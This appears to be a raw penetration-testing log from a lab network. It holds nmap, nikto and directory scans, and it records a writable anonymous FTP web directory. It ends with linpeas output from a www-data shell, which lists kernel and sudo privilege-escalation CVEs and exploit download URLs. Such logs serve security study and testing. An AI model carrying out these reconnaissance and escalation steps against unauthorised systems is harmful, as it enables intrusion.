Nmap done: 1 IP address (1 host up) scanned in 118.00 seconds
nikto -h 192.168.110.80:8080
---------------------------------------------------------------------------
+ Target IP: 192.168.110.80
+ Target Hostname: 192.168.110.80
+ Target Port: 8080
+ Start Time: 2022-12-11 07:02:28 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 7ac, size: 5cac60653cc22, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ 7917 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2022-12-11 07:02:41 (GMT1) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
dirb http://192.168.110.80:8080 -X .html,.php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Dec 11 07:04:26 2022
URL_BASE: http://192.168.110.80:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.html,.php) | (.html)(.php) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.110.80:8080/ ----
+ http://192.168.110.80:8080/index.html (CODE:200|SIZE:1964)
-----------------
END_TIME: Sun Dec 11 07:04:29 2022
DOWNLOADED: 9224 - FOUND: 1
nikto -h 192.168.110.80:8443
---------------------------------------------------------------------------
+ Target IP: 192.168.110.80
+ Target Hostname: 192.168.110.80
+ Target Port: 8443
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=CH/ST=Switzerland/L=Bern/O=OSSTMM
Ciphers: TLS_AES_256_GCM_SHA384
Issuer: /C=CH/ST=Switzerland/L=Bern/O=OSSTMM
+ Start Time: 2022-12-11 07:06:07 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 7ac, size: 5cac60653cc22, mtime: gzip
+ The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
+ Hostname '192.168.110.80' does not match certificate's names:
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2022-12-11 07:06:36 (GMT1) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
sudo nmap 192.168.110.80 -sV -oA 192_168_110_80/enumeration/nmap/vuln --script vuln -T5 -Pn -p22,3306,8080,8443
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 12:08 CET
Nmap scan report for 192.168.110.80
Host is up (0.00065s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
3306/tcp open mysql MySQL 8.0.26-0ubuntu0.20.04.2
|_sslv2-drown:
| vulners:
| MySQL 8.0.26-0ubuntu0.20.04.2:
|_ NODEJS:602 0.0 https://vulners.com/nodejs/NODEJS:602
8080/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.41:
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
|_ 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
8443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_sslv2-drown:
| vulners:
| cpe:/a:apache:http_server:2.4.41:
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
|_ 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.19 seconds
sudo nmap -sV -T4 -Pn -p- -O 192.168.110.120 -oA machines/192_168_110_120/enumeration/nmap/nmap_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 11:43 CET
Nmap scan report for 192.168.110.120
Host is up (0.0014s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
20021/tcp open ftp vsftpd 3.0.3
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.46 seconds
sudo nmap -sUV -T4 -p1-1000 --version-intensity 0 192.168.110.120 -oA machines/192_168_110_120/enumeration/nmap/nmap_udp_fullfast
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-20 18:16 CET
Nmap scan report for 192.168.110.120
Host is up (0.00081s latency).
All 1000 scanned ports on 192.168.110.120 are closed (955) or open|filtered (45)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1036.82 seconds
nikto -h 192.168.110.120
---------------------------------------------------------------------------
+ Target IP: 192.168.110.120
+ Target Hostname: 192.168.110.120
+ Target Port: 80
+ Start Time: 2022-12-11 07:08:50 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Multiple index files found: /index.php, /index.html
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ 7915 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2022-12-11 07:09:35 (GMT1) (45 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
gobuster dir -u http://192.168.110.120 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.110.120
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/12/11 07:10:48 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 280]
/.htpasswd (Status: 403) [Size: 280]
/.htaccess (Status: 403) [Size: 280]
/index.php (Status: 200) [Size: 6]
/index.html (Status: 200) [Size: 65]
/server-status (Status: 403) [Size: 280]
===============================================================
2022/12/11 07:10:51 Finished
===============================================================
dirb http://192.168.110.120 -X .html,.php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Dec 11 07:09:26 2022
URL_BASE: http://192.168.110.120/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.html,.php) | (.html)(.php) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.110.120/ ----
+ http://192.168.110.120/index.html (CODE:200|SIZE:65)
+ http://192.168.110.120/index.php (CODE:200|SIZE:6)
-----------------
END_TIME: Sun Dec 11 07:09:29 2022
DOWNLOADED: 9224 - FOUND: 3
sudo nmap 192.168.110.120 -sV -oA 192_168_110_120/enumeration/nmap/ftp --script "safe and ftp-*" -T5 -p20021
Starting Nmap 7.91 ( https://nmap.org ) at 2022-12-11 07:32 CET
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Nmap scan report for 192.168.110.120
Host is up (0.00089s latency).
PORT STATE SERVICE VERSION
20021/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 0 0 4096 Nov 20 22:19 html [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.120.51
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds
sudo nmap 192.168.110.135 -sV -oA 192_168_110_135/enumeration/nmap/vuln --script vuln -T5 -p22,80
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 12:08 CET
Nmap scan report for 192.168.110.135
Host is up (0.00039s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.41:
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
|_ 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.54 seconds
Vulnerable to CVE-2021-4034
Vulnerable to CVE-2021-3560
www-data@li204-vmLS5:/var/www/html$ ./linpeas.sh
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 5.4.0-74-generic (buildd@lgw01-amd64-038) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: li204-vmLS5.smartlearn.lan
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 5.4.0-74-generic (buildd@lgw01-amd64-038) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021
Distributor ID: Ubuntu
Description: Ubuntu 20.04.2 LTS
Release: 20.04
Codename: focal
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31
╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034
Vulnerable to CVE-2021-3560
Potentially Vulnerable to CVE-2022-2588
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Date & uptime
Sun Nov 20 22:20:38 CET 2022
22:20:38 up 4 days, 2:27, 0 users, load average: 0.47, 0.17, 0.05
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda5
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
UUID=b227b08c-5431-40bf-b56e-b3699d09a1b8 / ext4 errors=remount-ro 0 1
UUID=DC02-297F /boot/efi vfat umask=0077 0 1
/swapfile none swap sw 0 0
╔══════════╣ Environment
╚ Any private information inside environment variables?
HISTFILESIZE=0
LANGUAGE=en_US:en
SHLVL=1
OLDPWD=/var/www
LC_CTYPE=C.UTF-8
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
JOURNAL_STREAM=9:17744
_=./linpeas.sh
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
INVOCATION_ID=8d27b9188ee447f780e6f72ea1db6a6d
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
HISTSIZE=0
APACHE_RUN_GROUP=www-data
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html
HISTFILE=/dev/null
╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: probable
Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: mint=19,[ ubuntu=18|20 ], debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: probable
Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... disabled
